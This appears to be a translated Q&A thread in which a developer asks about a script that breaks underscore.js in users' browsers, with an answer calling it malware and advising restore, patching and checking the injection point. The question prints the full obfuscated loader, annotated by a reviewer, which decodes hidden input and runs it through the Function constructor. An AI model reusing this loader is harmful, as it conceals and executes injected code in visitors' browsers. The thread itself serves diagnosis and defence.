underscore(`_`)不是函数

时间:2015-05-11 11:04:01

标签: javascript overwrite malware

我们使用工具来跟踪用户浏览器中发生的 JS 错误。我们有时会看到 underscore 引发类似 `TypeError: string is not a function` 的错误,因为它被一个字符串覆盖了,该字符串的内容如下:

// NOTE(review): injected, obfuscated script as captured; the code is left byte-for-byte
// so the sample stays searchable. It is unrelated to underscore.js: `_0x...` are just
// generated identifiers that happen to begin with an underscore.
//
// String table. Apart from entry 0 ("triml") every entry is hex-escaped, and property
// names are split into fragments that are concatenated at the point of use, e.g.
//   [8]+[9]+[1]          -> "filter"       [5]+[6]+[7]         -> "constructor"
//   [1]+[2]+[3]+[4]      -> "return this"  [18]+[19]+[20]+[21] -> "prototype"
//   [11]+[12]+[13]+[14]+[15] -> "charCodeAt"
//   [10] "bind"  [17] "apply"  [22] "Function"  [23] "Math"  [24] "setInterval"
//   [25] "clearInterval"  [26] "join"  [27] "push"  [28] "parseInt"  [34] "split"
//   [35] "concat"  [39] "random"  [40] "splice"  [42] "toString"  [43] "\n\n\n"
// so a plain-text search for "constructor" or "Function" does not match this file.
//
// Defensive note: everything below depends on calling the Function constructor with
// source text (first to reach the global object, later to run decoded text). In page
// context a Content-Security-Policy that omits 'unsafe-eval' refuses those calls.
var _0x54e9 = ['triml', "\x72", "\x65\x74\x75\x72", "\x6E\x20\x74\x68", "\x69\x73", "\x63\x6F", "\x6E\x73\x74\x72", "\x75\x63\x74\x6F\x72", "\x66\x69", "\x6C\x74\x65", "\x62\x69\x6E\x64", "\x63", "\x68\x61\x72", "\x43", "\x6F", "\x64\x65\x41\x74", "", "\x61\x70\x70\x6C\x79", "\x70", "\x72\x6F\x74\x6F", "\x74", "\x79\x70\x65", "\x46\x75\x6E\x63\x74\x69\x6F\x6E", "\x4D\x61\x74\x68", "\x73\x65\x74\x49\x6E\x74\x65\x72\x76\x61\x6C", "\x63\x6C\x65\x61\x72\x49\x6E\x74\x65\x72\x76\x61\x6C", "\x6A\x6F\x69\x6E", "\x70\x75\x73\x68", "\x70\x61\x72\x73\x65\x49\x6E\x74", "\x66", "\x6D", "\x68", "\x61\x72", "\x64\x65", "\x73\x70\x6C\x69\x74", "\x63\x6F\x6E\x63\x61\x74", "\x31", "\x30", "\x32", "\x72\x61\x6E\x64\x6F\x6D", "\x73\x70\x6C\x69\x63\x65", "\x40", "\x74\x6F\x53\x74\x72\x69\x6E\x67", "\x0A\x0A\x0A", "\x6C\x65\x6E\x67\x74\x68", "\x6E", "\x61\x74"];
// `[].filter.constructor("return this")()` calls the Function constructor on the source
// text "return this" and so yields the global object without ever naming `window`.
// The statement installs a function as the global property "triml" (entry 0), bound to
// that global object.
//   _0x95b5x1 - string input; it is split into characters and read via charCodeAt below.
//   _0x95b5x2 - flag; when truthy the callback runs synchronously instead of through
//               setInterval, and caught errors are rethrown/returned instead of swallowed.
[][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[0]] = function(_0x95b5x1, _0x95b5x2) {
    try {
        // `with` is rejected in strict mode and ES modules, so this only parses as a classic
        // sloppy-mode script. The object shadows `console` and `window` with null inside the
        // block and supplies two scratch arrays, `s` and `c`.
        with({
            console: null,
            window: null,
            // s[0]: "\n\n\n" concatenated with itself until its length passes a randomised
            // threshold (Math.random() * 44332 + 323456), i.e. several hundred thousand
            // newlines. NOTE(review): purpose not evident from the code; presumably padding.
            s: [(function _0x95b5x10() {
                return (this[_0x54e9[44]] < ((([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[23]][_0x54e9[39]]() * 44332) + 323456) >> 0)) ? _0x95b5x10[_0x54e9[17]](this[_0x54e9[11] + _0x54e9[14] + _0x54e9[45] + _0x54e9[11] + _0x54e9[46]](this)) : this
            }[_0x54e9[17]](_0x54e9[43]))[_0x54e9[42]]()],
            // c: bit buffer filled by the decoder loop further down.
            c: []
        }) {
            // _0x95b5x3: "".charCodeAt bound to the input string (Function.prototype.bind.apply).
            var _0x95b5x3 = [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[22]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[10]][_0x54e9[17]]((_0x54e9[16])[_0x54e9[11] + _0x54e9[12] + _0x54e9[13] + _0x54e9[14] + _0x54e9[15]], [_0x95b5x1]),
                // _0x95b5x4: the global Math object.
                _0x95b5x4 = [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[23]],
                // _0x95b5x5: stand-in used in flag mode; calls its argument if it is truthy.
                _0x95b5x5 = (function(_0x95b5xf) {
                    _0x95b5xf && _0x95b5xf()
                }),
                // _0x95b5x6 / _0x95b5x7: setInterval / clearInterval bound to the global object,
                // or the stand-in above when _0x95b5x2 is truthy.
                _0x95b5x6 = _0x95b5x2 ? _0x95b5x5 : [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[24]][_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()),
                _0x95b5x7 = _0x95b5x2 ? _0x95b5x5 : [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[25]][_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()),
                // _0x95b5x8: scale for the randomised splice delete counts used below
                // (Math.random() * 1000000 + 1000000).
                _0x95b5x8 = 1000000,
                // _0x95b5x9: Array.prototype.join bound to `c` with an empty separator.
                _0x95b5x9 = [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[26]][_0x54e9[10]](c, [_0x54e9[16]]),
                // _0x95b5xa / _0x95b5xb: Array.prototype.push bound to `c` and to `s`.
                _0x95b5xa = [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[27]][_0x54e9[10]](c),
                _0x95b5xb = [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[27]][_0x54e9[10]](s),
                // _0x95b5xc: global parseInt.  _0x95b5xd: String.fromCharCode.
                _0x95b5xc = [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[28]],
                _0x95b5xd = (_0x54e9[16])[_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[29] + _0x54e9[1] + _0x54e9[14] + _0x54e9[30] + _0x54e9[13] + _0x54e9[31] + _0x54e9[32] + _0x54e9[13] + _0x54e9[14] + _0x54e9[33]],
                // _0x95b5xe: value returned by _0x95b5x6 (the interval id when setInterval is
                // used); the callback is scheduled with a 1 ms period.
                _0x95b5xe = _0x95b5x6(function() {
                    try {
                        (function() {
                            try {
                                // Each run first truncates `s` to its first element and empties `c`,
                                // then decodes _0x95b5x1 (loop below) and passes the joined contents of
                                // `s` to `this.constructor.constructor` -- `this` is an array here, so
                                // that is Function(text)(): the decoded text is executed as code
                                // (eval-equivalent). The interval is cleared once that call returns a
                                // falsy value; otherwise the callback runs again on the next tick.
                                [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](s, [1, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8]) && [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](c, [0, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8]) && _0x95b5x7(!(this[_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[17]](this[_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]], [(function() {
                                    // Decoder: walks _0x95b5x1 one character at a time (this[5] is the
                                    // cursor). Character code 31 appends "0" to the bit buffer `c`, any
                                    // other code appends "1"; an even code first flushes the buffer
                                    // through parseInt(bits, 2) -> String.fromCharCode into `s` and
                                    // clears `c`.
                                    // NOTE(review): reads like a payload hidden in whitespace/control
                                    // characters -- confirm against a captured input string.
                                    while ((this[5]++, _0x95b5xa(_0x95b5x3(this[5] - 1) ^ this[0] ? ((!((!(_0x95b5x3(this[5] - 1) & this[1])) && (_0x95b5xb(_0x95b5xd(_0x95b5xc(_0x95b5x9(), this[4])), [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](c, [0, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8]) && _0x54e9[16])))) ? this[1] : _0x54e9[16]) : this[2]), !!this[7 + this[5]])) {}
                                }[_0x54e9[10]](this)[_0x54e9[17]]()) || ([][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[26]][_0x54e9[17]](s, [_0x54e9[16]])) || _0x54e9[41]])() && [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](s, [1, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8])) && _0x95b5xe)
                            } catch (A) {
                                // Any error stops the timer; it is rethrown only in flag mode, so in
                                // the default mode failures leave no trace in the page's error handlers.
                                _0x95b5x7(_0x95b5xe);
                                if (_0x95b5x2) {
                                    throw A
                                };
                            }
                        // `this` for the function above: six state slots [31, "1", "0", "", "2", 0]
                        // followed by the individual characters of _0x95b5x1.
                        }[_0x54e9[10]]([31, _0x54e9[36], _0x54e9[37], _0x54e9[16], _0x54e9[38], 0][_0x54e9[35]](_0x95b5x1[_0x54e9[34]](_0x54e9[16])))())
                    } catch (A) {
                        if (_0x95b5x2) {
                            throw A
                        }
                    }
                }[_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()), 1)
        }
    } catch (A) {
        // Setup errors are swallowed unless the flag is set, in which case the error
        // object is returned to the caller rather than thrown.
        if (_0x95b5x2) {
            return A
        }
    }
}[_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])());

有没有人知道这是从何而来以及如何防止这种情况?

1 个答案:

答案 0 :(得分:1)

此代码与 underscore.js 无关,其中只是一些以 _ 开头的变量。恢复功能的最佳方法是从未受恶意软件影响的最近一次备份恢复站点。修复代码中的漏洞(例如MySQL注入)并更新第三方组件,以避免系统被进一步利用。经常更新和备份。注意:问题中的错误只是有时在用户浏览器中采集到,因此在恢复之前应先确认这段脚本确实出现在服务器返回的页面中,而不是仅在个别用户端(例如由浏览器扩展)被注入;两种情况的处理方式不同。